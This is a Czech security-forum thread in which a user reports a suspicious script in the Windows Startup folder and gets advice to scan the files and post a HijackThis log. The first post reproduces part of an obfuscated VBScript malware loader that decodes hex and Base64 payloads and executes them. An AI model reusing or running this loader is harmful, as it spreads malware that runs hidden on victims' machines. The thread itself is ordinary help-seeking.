podezřelý scriptový soubor v složce Po Spuštění Vyřešeno

Sekce věnovaná virům a jiným škodlivým kódům, rovněž ale nástrojům, kterým se lze proti nim bránit…

Moderátoři: Mods_senior, Security team

Zamčeno
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: květen 13
Bydliště: Tlučná
Pohlaví: Muž
Stav:
Offline

podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod filantan5544 » 25 čer 2015 20:38

dobrý den chtel jsem dát program core temp do složky po spustění a objevil jsem tam script s tímto kodem "
off = off & php("4A617665536372697074203D2022333958587065707369585836305858706570736958583931585870657073695858333258587065707369585831313458587065707369585831303158587065707369")
off = off & php("5858393958587065707369585831313158587065707369585831303058587065707369585831303158587065707369585831313458587065707369585833325858706570736958583538585870657073695858333258587065707369585831303458587065707369585831313158587065707369585831313758587065707369")
off = off & php("5858313030585870657073695858313035585870657073695858313130585870657073695858313035585870657073695858333258587065707369585834305858706570736958583939585870657073695858343158587065707369585833325858706570736958583131355858706570736958583130375858706570736958")
off = off & php("5831323158587065707369585831313258587065707369585831303158587065707369585833325858706570736958583538585870657073695858333258587065707369585831303458587065707369585831313158587065707369585831313758587065707369585831303058587065707369585831303558587065707369")
off = off & php("5858313130585870657073695858313035585870657073695858343558587065707369585831303258587065707369585831323058587065707369585833325858706570736958583933585870657073695858363258587065707369585831335858706570736958583130585870657073695858313358587065707369585831")
off = off & php("617461203D20300D0A456C73650D0A7468697344617461203D20496E53747228312C204261736536342C2074686973436861722C20766242696E617279436F6D7061726529202D20310D0A456E642049660D0A4966207468697344617461203D202D31205468656E0D0A4572722E526169736520322C20224261736536344465")
off = off & php("636F6465222C20224261642063686172616374657220496E2042617365363420737472696E672E220D0A457869742046756E6374696F6E0D0A456E642049660D0A6E47726F7570203D203634202A206E47726F7570202B2074686973446174610D0A4E6578740D0A6E47726F7570203D20486578286E47726F7570290D0A6E47")
off = off & php("726F7570203D20537472696E672836202D204C656E286E47726F7570292C20223022292026206E47726F75700D0A704F7574203D2043687228434279746528222648222026204D6964286E47726F75702C20312C2032292929202B205F0D0A43687228434279746528222648222026204D6964286E47726F75702C20332C2032")
off = off & php("292929202B205F0D0A43687228434279746528222648222026204D6964286E47726F75702C20352C20322929290D0A734F7574203D20734F75742026204C65667428704F75742C206E756D446174614279746573290D0A4E6578740D0A4261736536344465636F6465203D20734F75740D0A456E642046756E6374696F6E0D0A")
off = off & php("44696D2044414441445257574553415344440D0A4441444144525757455341534444203D2022585870657073695858220D0A44696D204441444144525757455341534444310D0A444144414452575745534153444431203D2044414441445257574553415344440D0A44696D204441444144525757455341534444320D0A4441")
off = off & php("44414452575745534153444432203D204441444144525757455341534444310D0A44696D204441444144525757455341534444330D0A444144414452575745534153444433203D204441444144525757455341534444320D0A44696D204441444144525757455341534444340D0A444144414452575745534153444434203D20")
off = off & php("4441444144525757455341534444330D0A44696D204441444144525757455341534444350D0A444144414452575745534153444435203D204441444144525757455341534444340D0A44696D204441444144525757455341534444360D0A444144414452575745534153444436203D204441444144525757455341534444350D")
off = off & php("0A44696D204441444144525757455341534444370D0A444144414452575745534153444437203D204441444144525757455341534444360D0A466F7220454545203D203020544F2035300D0A4946204A617665536372697074203D202222205468656E0D0A6D7367626F7828223030646422290D0A44696D204545450D0A696E")
off = off & php("707574626F78282273646653444622290D0A456C73654966204A617665536372697074203D2022506550736922205468656E0D0A696E7075626F78282273646622290D0A456C73654966204A617665536372697074203D20226664676822205468656E0D0A6D7367626F782822686A22290D0A456C73654966204A6176655363")
off = off & php("72697074203D202271717722205468656E0D0A6D7367626F78282272657222290D0A456E642049660D0A4E4558540D0A4A617665536372697074203D2053504C4954284A6176655363726970742C444144414452575745534153444437290D0A46756E6374696F6E2053686F7753756D2876616C7565312C2076616C75653229")
off = off & php("0D0A44696D2073756D0D0A272044657465726D696E6520616E6420646973706C6179207468652073756D2E0D0A73756D203D2076616C756531202B2076616C7565320D0A4D7367426F7820225468652073756D2069733A20202220262073756D0D0A2720536574207468652066756E6374696F6E27732072657475726E207661")
off = off & php("6C75652E0D0A53686F7753756D203D2073756D0D0A456E642046756E6374696F6E0D0A46756E6374696F6E2052656528566172290D0A526565203D20426173653634456E636F646528566172290D0A456E642046756E6374696F6E0D0A46756E6374696F6E20426173653634456E636F646528696E44617461290D0A436F6E73")
off = off & php("7420426173653634203D20224142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A303132333435363738392B2F220D0A44696D20634F75742C20734F75742C20490D0A466F722049203D203120546F204C656E28696E4461746129205374657020")
off = off & php("330D0A44696D206E47726F75702C20704F75742C207347726F75700D0A6E47726F7570203D2026483130303030202A20417363284D696428696E446174612C20492C20312929202B205F0D0A2648313030202A204D79415343284D696428696E446174612C2049202B20312C20312929202B204D79415343284D696428696E44")
off = off & php("6174612C2049202B20322C203129290D0A6E47726F7570203D204F6374286E47726F7570290D0A6E47726F7570203D20537472696E672838202D204C656E286E47726F7570292C20223022292026206E47726F75700D0A704F7574203D204D6964284261736536342C20434C6E672822266F222026204D6964286E47726F7570")
off = off & php("2C20312C20322929202B20312C203129202B205F0D0A4D6964284261736536342C20434C6E672822266F222026204D6964286E47726F75702C20332C20322929202B20312C203129202B205F0D0A4D6964284261736536342C20434C6E672822266F222026204D6964286E47726F75702C20352C20322929202B20312C203129")
off = off & php("202B205F0D0A4D6964284261736536342C20434C6E672822266F222026204D6964286E47726F75702C20372C20322929202B20312C2031290D0A734F7574203D20734F7574202B20704F75740D0A4E6578740D0A53656C6563742043617365204C656E28696E4461746129204D6F6420330D0A4361736520313A202738206269")
off = off & php("742066696E616C0D0A734F7574203D204C65667428734F75742C204C656E28734F757429202D203229202B20223D3D220D0A4361736520323A20273136206269742066696E616C0D0A734F7574203D204C65667428734F75742C204C656E28734F757429202D203129202B20223D220D0A456E642053656C6563740D0A426173")
off = off & php("653634456E636F6465203D20734F75740D0A456E642046756E6374696F6E0D0A46756E6374696F6E204D79415343284F6E6543686172290D0A4966204F6E6543686172203D202222205468656E204D79415343203D203020456C7365204D79415343203D20417363284F6E6543686172290D0A456E642046756E6374696F6E0D")
off = off & php("0A464F522058203D203020544F2055424F554E44284A61766553637269707429202D310D0A436F6465646520203D205265652843687257284A61766553637269707428582929290D0A5065507369203D2050655073692026204261736536344465636F6465285265652843687257284A6176655363726970742858292929290D")
off = off & php("0A4E4558540D0A5065507369203D20426173653634456E636F6465285065507369290D0A4558454355544520284261736536344465636F64652850655073692929")
ExecuteGlobal off
Function php(off) : For y = 1 To Len(off) Step 2 : ub = ub & Chr(Clng("&H" & Mid(off, y, 2))) : Next : php = ub : End Function
" a takto bych mohl pokračovat do aleluja je tam přes 381300 znaků nevíte co to je
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Reklama
Top
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: květen 13
Bydliště: Tlučná
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod filantan5544 » 25 čer 2015 20:40

jo a jeste je tam soubor 301b5fcf8ce2fab8868e80b6c1f912fe.exe asi to patří k tomu .
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
Oxxid
člen BSOD týmu
Master Level 8
Master Level 8
Příspěvky: 6194
Registrován: prosinec 12
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod Oxxid » 25 čer 2015 20:44

Ten exac nahrej na virustotal.com a postni sem link.
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: květen 13
Bydliště: Tlučná
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod filantan5544 » 26 čer 2015 00:18

https://www.virustotal.com/cs/file/903a ... /analysis/ napsalo mi to že tento soubor tam již byl analizován přede 4 týdny takže má asi stejný zdroják ale jiný název :) ale je to ono:D a jak se tak na to koukam tak to pošlu k analíze do AVIRI protože tenhle virus ještě ve své databázy nemají :D
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
jerabina
člen Security týmu
Level 6
Level 6
Příspěvky: 3647
Registrován: březen 13
Bydliště: Litoměřice
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod jerabina » 26 čer 2015 06:27

Doporučil bych ti udělat si log z programu HJT a přiít k nám do sekce HiJackThis, nejspíše tam toho bude více.
Když nevíš jak dál, přichází na řadu prostudovat manuál!
HJT návod

Pokud neodpovídám do vašich témat v sekci HJT když jsem online, tak je to jen proto, že jsem na mobilu kde je studování logů a psaní skriptů nemožné. Neberte to tedy prosím jako ignoraci.
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: květen 13
Bydliště: Tlučná
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod filantan5544 » 26 čer 2015 13:10

?????? jak to mám udělat :)
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
Orcus
člen Security týmu
Elite Level 10.5
Elite Level 10.5
Příspěvky: 10645
Registrován: duben 10
Bydliště: Okolo rostou 3 růže =o)
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod Orcus » 27 čer 2015 07:36

Návod u mě či jerabiny v podpisu. ;)
Láska hřeje, ale uhlí je uhlí. :fire:


Log z HJT vkládejte do HJT sekce. Je-li moc dlouhý, rozděl jej do více zpráv.

Pár rad k bezpečnosti PC.

Po dobu mé nepřítomnosti mě zastupuje memphisto, jaro3 a Diallix

Pokud budete spokojeni , můžete podpořit naše fórum.
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: květen 13
Bydliště: Tlučná
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvekod filantan5544 » 30 čer 2015 23:41

házelo mi to modrou smrt a když jsem to chtel odstranit tak se tam objevyli znova a dávalo mi to i do telefonu najednou mi avira v telefonu ukazala 78viru tak jsem řekl a dost a přeinstaloval jsem system a už je to v poho ale sere me že sem musel zformatovat jak telefon tak počítač protože ty viri se navazovali na normalni soubory :(
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
Pic
Moderátor
Guru Level 13
Guru Level 13
Příspěvky: 23292
Registrován: září 06
Bydliště: Východní Čechy
Pohlaví: Muž
Stav:
Offline

Re: podezřelý scriptový soubor v složce Po Spuštění  Vyřešeno

Příspěvekod Pic » 01 črc 2015 00:31

Takže pokud je problém vyřešen, klikni na zelené zatržítko.
Přečti si pravidla tohoto fóra! Přečetl jsi si nejprve manuál? Piš tak, abychom Ti rozuměli! Na SZ neodpovídám na požadavky řešení Vašich problémů s PC!
Nic není dokonalé, ani člověk!
Nahoru
Zamčeno

Zpět na “Viry, antiviry, firewally…”

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 12 hostů